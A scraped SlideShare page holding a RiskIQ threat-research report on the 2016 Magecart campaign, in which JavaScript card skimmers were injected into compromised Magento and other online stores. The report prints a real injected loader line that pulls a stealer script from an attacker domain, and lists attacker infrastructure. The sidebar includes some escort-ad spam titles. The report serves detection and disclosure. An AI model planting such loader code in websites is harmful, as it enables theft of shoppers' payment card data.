Raimondo Villano - Vasi di farmacia (1a parte)Raimondo Villano - Vasi di farmacia (1a parte)
Raimondo Villano - Vasi di farmacia (1a parte)Raimondo Villano
 
Emotioneel Intelligente Zorgrobots die met Moreel Besef onze Autonomie Stimul...
Emotioneel Intelligente Zorgrobots die met Moreel Besef onze Autonomie Stimul...Emotioneel Intelligente Zorgrobots die met Moreel Besef onze Autonomie Stimul...
Emotioneel Intelligente Zorgrobots die met Moreel Besef onze Autonomie Stimul...Matthijs Pontier
 
Optimización del rastreo y la indexación y típs par WP
Optimización del rastreo y la indexación y típs par WPOptimización del rastreo y la indexación y típs par WP
Optimización del rastreo y la indexación y típs par WPJavier Lorente
 

Viewers also liked (7)

Vincent Eku Resume
Vincent Eku ResumeVincent Eku Resume
Vincent Eku Resume
 
Informe de gestion daniela gutierrez
Informe de gestion daniela gutierrezInforme de gestion daniela gutierrez
Informe de gestion daniela gutierrez
 
Il Mobbing Secondario e gli effetti sulla prole in età evolutiva - Tesi di La...
Il Mobbing Secondario e gli effetti sulla prole in età evolutiva - Tesi di La...Il Mobbing Secondario e gli effetti sulla prole in età evolutiva - Tesi di La...
Il Mobbing Secondario e gli effetti sulla prole in età evolutiva - Tesi di La...
 
Raimondo Villano - Vasi di farmacia (1a parte)
Raimondo Villano - Vasi di farmacia (1a parte)Raimondo Villano - Vasi di farmacia (1a parte)
Raimondo Villano - Vasi di farmacia (1a parte)
 
Emotioneel Intelligente Zorgrobots die met Moreel Besef onze Autonomie Stimul...
Emotioneel Intelligente Zorgrobots die met Moreel Besef onze Autonomie Stimul...Emotioneel Intelligente Zorgrobots die met Moreel Besef onze Autonomie Stimul...
Emotioneel Intelligente Zorgrobots die met Moreel Besef onze Autonomie Stimul...
 
Petrarca
PetrarcaPetrarca
Petrarca
 
Optimización del rastreo y la indexación y típs par WP
Optimización del rastreo y la indexación y típs par WPOptimización del rastreo y la indexación y típs par WP
Optimización del rastreo y la indexación y típs par WP
 

Similar to Compromised e commerce_sites_lead_to_web-based_keyloggers

1 Manic Menagerie Malicious activity target.docx
1 Manic Menagerie Malicious activity target.docx 1 Manic Menagerie Malicious activity target.docx
1 Manic Menagerie Malicious activity target.docxShiraPrater50
 
A Multidimensional View of Critical Web Application Security Risks: A Novel '...
A Multidimensional View of Critical Web Application Security Risks: A Novel '...A Multidimensional View of Critical Web Application Security Risks: A Novel '...
A Multidimensional View of Critical Web Application Security Risks: A Novel '...Cognizant
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing BasicsRick Wanner
 
Intelligent Phishing Website Detection and Prevention System by Using Link Gu...
Intelligent Phishing Website Detection and Prevention System by Using Link Gu...Intelligent Phishing Website Detection and Prevention System by Using Link Gu...
Intelligent Phishing Website Detection and Prevention System by Using Link Gu...IOSR Journals
 
IRJET - Chrome Extension for Detecting Phishing Websites
IRJET - Chrome Extension for Detecting Phishing WebsitesIRJET - Chrome Extension for Detecting Phishing Websites
IRJET - Chrome Extension for Detecting Phishing WebsitesIRJET Journal
 
IRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and BlockingIRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and BlockingIRJET Journal
 
Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...
Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...
Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...Alan McSweeney
 
Tracing out Cross Site Scripting Vulnerabilities in Modern Scripts
Tracing out Cross Site Scripting Vulnerabilities in Modern ScriptsTracing out Cross Site Scripting Vulnerabilities in Modern Scripts
Tracing out Cross Site Scripting Vulnerabilities in Modern ScriptsEswar Publications
 
HallTumserFinalPaper
HallTumserFinalPaperHallTumserFinalPaper
HallTumserFinalPaperDaniel Tumser
 
A web content analytics
A web content analyticsA web content analytics
A web content analyticscsandit
 
Intelligent cyber security solutions
Intelligent cyber security solutionsIntelligent cyber security solutions
Intelligent cyber security solutionsSwapnil Deshmukh
 
CSI2008 Gunter Ollmann Man-in-the-browser
CSI2008 Gunter Ollmann Man-in-the-browserCSI2008 Gunter Ollmann Man-in-the-browser
CSI2008 Gunter Ollmann Man-in-the-browserguestb1956e
 
IRJET- Detecting Phishing Websites using Machine Learning
IRJET- Detecting Phishing Websites using Machine LearningIRJET- Detecting Phishing Websites using Machine Learning
IRJET- Detecting Phishing Websites using Machine LearningIRJET Journal
 
Cyber crime - Understanding the Organised Criminal Group model
Cyber crime - Understanding the Organised Criminal Group modelCyber crime - Understanding the Organised Criminal Group model
Cyber crime - Understanding the Organised Criminal Group modelInnesGerrard
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developersJohn Ombagi
 
Analyzing the effectualness of Phishing Algorithms in Web Applications Inques...
Analyzing the effectualness of Phishing Algorithms in Web Applications Inques...Analyzing the effectualness of Phishing Algorithms in Web Applications Inques...
Analyzing the effectualness of Phishing Algorithms in Web Applications Inques...Editor IJMTER
 
IRJET - PHISCAN : Phishing Detector Plugin using Machine Learning
IRJET - PHISCAN : Phishing Detector Plugin using Machine LearningIRJET - PHISCAN : Phishing Detector Plugin using Machine Learning
IRJET - PHISCAN : Phishing Detector Plugin using Machine LearningIRJET Journal
 
How Can I Reduce The Risk Of A Cyber-Attack?
How Can I Reduce The Risk Of A Cyber-Attack?How Can I Reduce The Risk Of A Cyber-Attack?
How Can I Reduce The Risk Of A Cyber-Attack?Osei Fortune
 
Smart-Authentication: A secure web service for providing bus pass renewal system
Smart-Authentication: A secure web service for providing bus pass renewal systemSmart-Authentication: A secure web service for providing bus pass renewal system
Smart-Authentication: A secure web service for providing bus pass renewal systemIRJET Journal
 

Similar to Compromised e commerce_sites_lead_to_web-based_keyloggers (20)

1 Manic Menagerie Malicious activity target.docx
1 Manic Menagerie Malicious activity target.docx 1 Manic Menagerie Malicious activity target.docx
1 Manic Menagerie Malicious activity target.docx
 
A Multidimensional View of Critical Web Application Security Risks: A Novel '...
A Multidimensional View of Critical Web Application Security Risks: A Novel '...A Multidimensional View of Critical Web Application Security Risks: A Novel '...
A Multidimensional View of Critical Web Application Security Risks: A Novel '...
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
Intelligent Phishing Website Detection and Prevention System by Using Link Gu...
Intelligent Phishing Website Detection and Prevention System by Using Link Gu...Intelligent Phishing Website Detection and Prevention System by Using Link Gu...
Intelligent Phishing Website Detection and Prevention System by Using Link Gu...
 
IRJET - Chrome Extension for Detecting Phishing Websites
IRJET - Chrome Extension for Detecting Phishing WebsitesIRJET - Chrome Extension for Detecting Phishing Websites
IRJET - Chrome Extension for Detecting Phishing Websites
 
IRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and BlockingIRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
 
Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...
Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...
Whitepaper Real Time Transaction Analysis And Fraudulent Transaction Detect...
 
Tracing out Cross Site Scripting Vulnerabilities in Modern Scripts
Tracing out Cross Site Scripting Vulnerabilities in Modern ScriptsTracing out Cross Site Scripting Vulnerabilities in Modern Scripts
Tracing out Cross Site Scripting Vulnerabilities in Modern Scripts
 
HallTumserFinalPaper
HallTumserFinalPaperHallTumserFinalPaper
HallTumserFinalPaper
 
A web content analytics
A web content analyticsA web content analytics
A web content analytics
 
Intelligent cyber security solutions
Intelligent cyber security solutionsIntelligent cyber security solutions
Intelligent cyber security solutions
 
CSI2008 Gunter Ollmann Man-in-the-browser
CSI2008 Gunter Ollmann Man-in-the-browserCSI2008 Gunter Ollmann Man-in-the-browser
CSI2008 Gunter Ollmann Man-in-the-browser
 
IRJET- Detecting Phishing Websites using Machine Learning
IRJET- Detecting Phishing Websites using Machine LearningIRJET- Detecting Phishing Websites using Machine Learning
IRJET- Detecting Phishing Websites using Machine Learning
 
Dynamic watermarking
Dynamic watermarkingDynamic watermarking
Dynamic watermarking
 
Cyber crime - Understanding the Organised Criminal Group model
Cyber crime - Understanding the Organised Criminal Group modelCyber crime - Understanding the Organised Criminal Group model
Cyber crime - Understanding the Organised Criminal Group model
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers
 
Analyzing the effectualness of Phishing Algorithms in Web Applications Inques...
Analyzing the effectualness of Phishing Algorithms in Web Applications Inques...Analyzing the effectualness of Phishing Algorithms in Web Applications Inques...
Analyzing the effectualness of Phishing Algorithms in Web Applications Inques...
 
IRJET - PHISCAN : Phishing Detector Plugin using Machine Learning
IRJET - PHISCAN : Phishing Detector Plugin using Machine LearningIRJET - PHISCAN : Phishing Detector Plugin using Machine Learning
IRJET - PHISCAN : Phishing Detector Plugin using Machine Learning
 
How Can I Reduce The Risk Of A Cyber-Attack?
How Can I Reduce The Risk Of A Cyber-Attack?How Can I Reduce The Risk Of A Cyber-Attack?
How Can I Reduce The Risk Of A Cyber-Attack?
 
Smart-Authentication: A secure web service for providing bus pass renewal system
Smart-Authentication: A secure web service for providing bus pass renewal systemSmart-Authentication: A secure web service for providing bus pass renewal system
Smart-Authentication: A secure web service for providing bus pass renewal system
 

More from Andrey Apuhtin

Shadow pad technical_description_pdf
Shadow pad technical_description_pdfShadow pad technical_description_pdf
Shadow pad technical_description_pdfAndrey Apuhtin
 
Ftc cdt-vpn-complaint-8-7-17
Ftc cdt-vpn-complaint-8-7-17Ftc cdt-vpn-complaint-8-7-17
Ftc cdt-vpn-complaint-8-7-17Andrey Apuhtin
 
Hutchins redacted indictment
Hutchins redacted indictmentHutchins redacted indictment
Hutchins redacted indictmentAndrey Apuhtin
 
Dr web review_mob_july_2017
Dr web review_mob_july_2017Dr web review_mob_july_2017
Dr web review_mob_july_2017Andrey Apuhtin
 
Nexusguard d do_s_threat_report_q1_2017_en
Nexusguard d do_s_threat_report_q1_2017_enNexusguard d do_s_threat_report_q1_2017_en
Nexusguard d do_s_threat_report_q1_2017_enAndrey Apuhtin
 
Pandalabs отчет за 1 квартал 2017
Pandalabs отчет за 1 квартал 2017Pandalabs отчет за 1 квартал 2017
Pandalabs отчет за 1 квартал 2017Andrey Apuhtin
 
Lookout pegasus-android-technical-analysis
Lookout pegasus-android-technical-analysisLookout pegasus-android-technical-analysis
Lookout pegasus-android-technical-analysisAndrey Apuhtin
 
Apwg trends report_q4_2016
Apwg trends report_q4_2016Apwg trends report_q4_2016
Apwg trends report_q4_2016Andrey Apuhtin
 
News berthaume-sentencing-jan2017
News berthaume-sentencing-jan2017News berthaume-sentencing-jan2017
News berthaume-sentencing-jan2017Andrey Apuhtin
 
Windows exploitation-2016-a4
Windows exploitation-2016-a4Windows exploitation-2016-a4
Windows exploitation-2016-a4Andrey Apuhtin
 

More from Andrey Apuhtin (20)

Shadow pad technical_description_pdf
Shadow pad technical_description_pdfShadow pad technical_description_pdf
Shadow pad technical_description_pdf
 
Ftc cdt-vpn-complaint-8-7-17
Ftc cdt-vpn-complaint-8-7-17Ftc cdt-vpn-complaint-8-7-17
Ftc cdt-vpn-complaint-8-7-17
 
Hutchins redacted indictment
Hutchins redacted indictmentHutchins redacted indictment
Hutchins redacted indictment
 
Dr web review_mob_july_2017
Dr web review_mob_july_2017Dr web review_mob_july_2017
Dr web review_mob_july_2017
 
Dmarc
DmarcDmarc
Dmarc
 
Nexusguard d do_s_threat_report_q1_2017_en
Nexusguard d do_s_threat_report_q1_2017_enNexusguard d do_s_threat_report_q1_2017_en
Nexusguard d do_s_threat_report_q1_2017_en
 
Pandalabs отчет за 1 квартал 2017
Pandalabs отчет за 1 квартал 2017Pandalabs отчет за 1 квартал 2017
Pandalabs отчет за 1 квартал 2017
 
Sel03129 usen
Sel03129 usenSel03129 usen
Sel03129 usen
 
Cldap threat-advisory
Cldap threat-advisoryCldap threat-advisory
Cldap threat-advisory
 
Lookout pegasus-android-technical-analysis
Lookout pegasus-android-technical-analysisLookout pegasus-android-technical-analysis
Lookout pegasus-android-technical-analysis
 
Rand rr1751
Rand rr1751Rand rr1751
Rand rr1751
 
Apwg trends report_q4_2016
Apwg trends report_q4_2016Apwg trends report_q4_2016
Apwg trends report_q4_2016
 
Browser history
Browser historyBrowser history
Browser history
 
Software
SoftwareSoftware
Software
 
Antivirus
AntivirusAntivirus
Antivirus
 
Https interception
Https interceptionHttps interception
Https interception
 
Wilssc 006 xml
Wilssc 006 xmlWilssc 006 xml
Wilssc 006 xml
 
News berthaume-sentencing-jan2017
News berthaume-sentencing-jan2017News berthaume-sentencing-jan2017
News berthaume-sentencing-jan2017
 
Windows exploitation-2016-a4
Windows exploitation-2016-a4Windows exploitation-2016-a4
Windows exploitation-2016-a4
 
Mw stj 08252016_2
Mw stj 08252016_2Mw stj 08252016_2
Mw stj 08252016_2
 

Recently uploaded

Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEOrtus Solutions, Corp
 
software engineering Chapter 5 System modeling.pptx
software engineering Chapter 5 System modeling.pptxsoftware engineering Chapter 5 System modeling.pptx
software engineering Chapter 5 System modeling.pptxnada99848
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaHanief Utama
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Andreas Granig
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityNeo4j
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024StefanoLambiase
 
Cloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEECloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEEVICTOR MAESTRE RAMIREZ
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...soniya singh
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideChristina Lin
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackVICTOR MAESTRE RAMIREZ
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfAlina Yurenko
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsAhmed Mohamed
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptkotipi9215
 

Recently uploaded (20)

Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
software engineering Chapter 5 System modeling.pptx
software engineering Chapter 5 System modeling.pptxsoftware engineering Chapter 5 System modeling.pptx
software engineering Chapter 5 System modeling.pptx
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief Utama
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered Sustainability
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
 
Cloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEECloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEE
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML Diagrams
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.ppt
 

Compromised e commerce_sites_lead_to_web-based_keyloggers

  • 1. RiskIQ Research: Compromised eCommerce Sites Lead to Web-Based Keyloggers Most methods used by attackers to target consumers are commonplace, such as phishing and the use of malware to target payment cards. Others, such as POS (point of sale) malware, tend to be rarer and isolated to certain industries. However, some methods are downright obscure—a recently observed instance of threat actors injecting a keylogger directly into a website is one of these. Targeting Consumers Via Retailer Payment Platforms Since the widely publicized breach of Target Corporation, there has been a significant increase in awareness of activity surrounding POS (point of sale) system breaches. But web-based keylogger injection incidents continue to be little-known, even though they've been occurring for even longer than threats related to many high-profile breaches. In 2000, the discovery of a ​vulnerability​ in versions of the widely-deployed Cart32 software, which enables consumers to shop online, gave threat actors access to the application as the administrator so they could dump credit card data and run commands on the hosting server. In 2007, discussions like ​this​ in the OSCommerce community illustrated more instances. Later in 2011, ​analysis​ showed additional mass compromise activity in OSCommerce pushing online store visitors to information-stealing malware. Since then, this kind of activity increased, affecting other popular shopping cart software implementations. ● https://www.atwix.com/magento/credit-card-numbers-leak/ ● http://www.snapfast.com/blog/magento-mage-jpg-hack/ ● https://blog.sucuri.net/2015/04/impacts-of-a-hack-on-a-magento-ecommerce-website.ht ml ● https://blog.sucuri.net/2015/06/magento-platform-targeted-by-credit-card-scrapers.html ● https://blog.sucuri.net/2016/06/magento-credit-card-stealer-braintree-extension.html 2016 Magecart injections In 2016, the trend continues. Numerous hacked eCommerce websites appear to be affected by a new compromise that injects JavaScript code into the site, which allows attackers to capture payment card information. RiskIQ has observed this campaign ranging back to at least March 2016, with new attacker infrastructure rolling out steadily since then. Public analysis of aspects of the activity was ​shared​ in June by Sucuri.
  • 2. RiskIQ has termed this set of credit card stealer activity "Magecart" for tracking purposes. Through analysis of data in ​RiskIQ Security Intelligence Services​ and RiskIQ’s ​PassiveTotal​, we’ve discovered that, although somewhat similar to other active credit card stealer operations, Magecart is significant for a few reasons. 1. Affected sites are hosted on multiple eCommerce platforms. At least the following technologies are explicitly seen to be impacted by this activity: ● Magento Commerce ● Powerfront CMS ● OpenCart 2. Multiple payment services provider linkages are targeted on affected sites as well, including: ● Braintree ● VeriSign payment processing 3. Formgrabber/credit card stealer content is hosted on remote attacker-operated sites, served over HTTPS. Stolen data is also exfiltrated to these sites using HTTPS. 4. Attackers have refined their malicious content over time, with identified samples in RiskIQ data showing evidence of: ● Testing and capabilities development ● Increased scope of targeting payment platforms ● Development and testing of enhancements ● Addition of obfuscation to hinder analysis and identification ● Attempts to hide behind brands of commonplace web technologies to blend in on compromised sites 5. The credit card stealer works in a very similar manner on the compromised web server as a banking trojan functions on a compromised victim workstation. Code is injected which can “hook” web forms and access data form submissions much like a ​formgrabber​. Data is exfiltrated from the compromised server to a ​dropzone​ for attacker collection. There is also some indication in related payloads that attackers may be injecting bogus form fields into payment forms to solicit additional data from victims, similar to how ​webinjects​ operate when logged into a banking website from a compromised endpoint. Further insight​ on the functionality of the stealers observed in this campaign is available from ClearSky Cybersecurity. We thank them for their assistance in analyzing and disclosing this threat activity. An approximate timeline in observations from analyzed data provides the following insight:
  • 3. 1. March 2016: The domain ​statsdot.eu​ was registered, indicating possible early stages of the immediate Magecart campaign. Injections were simplistic and payloads were largely unobfuscated. 2. May 2016: An increase in activity was noted in RiskIQ data, with some emergence of obfuscation. Unusual two-stage form of payload delivery observed (two domains used to serve injection to site visitors). The addition of conditional activation of stealer scripts by targeted cart URLs (checkout pages, etc.) were observed. 3. June 2016: Activity peaked and RiskIQ observed domains with change of hosting to AS203624 DATAFLOWSU​, a ​recognized​ Eastern European “bulletproof hoster” (hosting and network services provider operated by and catering to cybercriminal interests). 4. September 2016: Additional obfuscated script injections and remotely hosted JS were observed. At this time, activity is reduced but steady. How Magecart Works With RiskIQ’s crawling infrastructure, which captures the full sequence of events and page contents—including the Document Object Model (DOM), we can illustrate the operation of this campaign. The following sections present incidents on some affected websites. www.faber.co.uk In ​May 2016​, RiskIQ observed the website of ​Faber and Faber​, famed UK book publishing house, to be serving Magecart injections from their Magento site.
  • 4. The injection in the source of the site can be seen with a simple addition of a ​script tag. When the injected web page on the merchant site is loaded, the malicious keylogger script is also loaded in the background. The keylogger script can access the browser session and submitted data.
  • 5. In this case, the attacker delivers the malicious credit card stealer script in two stages: 1. The injected URL verifies that the page the site visitor is on is a checkout URL where cardholder data will be entered. In the delivered code, it is visible, for example, that the Firecheckout​ extension for Magento is targeted. 2. If the test succeeds, the stealer script is loaded from the second stage script URL: if((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location)) {document.write('<script src="https://jquery-cdn.top/mage.js"></script>')}; The resulting stealer script as served in this incident is shown below: The basic functionality of this script is to capture data from form fields and send the data to the remote URL using an AJAX call. Looking into the hosting for this attacker infrastructure, we see the following components active at the time: mageonline.net 108.61.188.71 jquery-cdn.top 45.32.153.108 45.32.153.108​ AS20473 | US | AS-CHOOPA - Choopa LLC 108.61.188.71​ AS20473 | US | AS-CHOOPA - Vultr Holdings LLC
  • 6. Domain registration data (domain, registrant date, registrar, nameserver domain(s), registrant name and email): JQUERY-CDN.TOP​ 2016-05-09 PDR Ltd bitcoin-dns.hosting Ted 31338@mail.ru MAGEONLINE.NET​ 2016-05-16 PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM bitcoin-dns.hosting Gregory braun.security@yandex.com Note The domain jquery-cdn.top may sound familiar to readers. In 2014 a threat actor group used the domain jquery-cdn.com in a series of attacks against web sites, injecting malicious redirects into them to hijack visitor traffic to push victims to an instance of a crimeware exploit kit. https://www.riskiq.com/blog/labs/jquerycom-malware-attack-puts-privileged-enterprise- it-accounts-at-risk/ This was a different attack campaign with different goals but illustrates a common technique in website hijacking where domain names and similar indicators are chosen with careful intent to allow attacker modifications and network traffic to blend in and avoid suspicion by onlookers. The names of popular JavaScript libraries is a common choice because of their presence on so many websites. A listing of Magecart domains and sampling of URLs is presented at the end of this report to illustrate how this concept influenced this attacker’s choice of naming their infrastructure. A short time later in the month, RiskIQ observed the attack site serving slightly modified payloads:
  • 7. We believe this modification indicates work in progress on developing and enhancing the attacker’s code. You can see that commented sections were added to the file referencing form fields related to ​Braintree’s​ Magento module. Braintree is a payment processing service that may be snapped into the Magento platform to facilitate payment handling. The addition of this code may be an indication of development and expansion of cardholder data targeting by the attacker. We also note that the bottom of the file also contains a call to console.log(), which aids the site visitor in debugging elements on the page. Verifying the victim eCommerce site, in this case, we note that the site indeed included Braintree-related JavaScript libraries. Opportunistic attackers may not always be able to predict the internals of how a compromised website handles details like payment processing and credit card handling. However, it's likely that upon access to multiple victim websites, threat actors realized they needed to add additional support for the variety of services used in the eCommerce space, leading to this on-the-fly development. www.everlast.com Later in May​, we identified that the main site of clothing/fitness powerhouse ​Everlast Worldwide, Inc.​ was compromised and abused to steal credit card data by the same 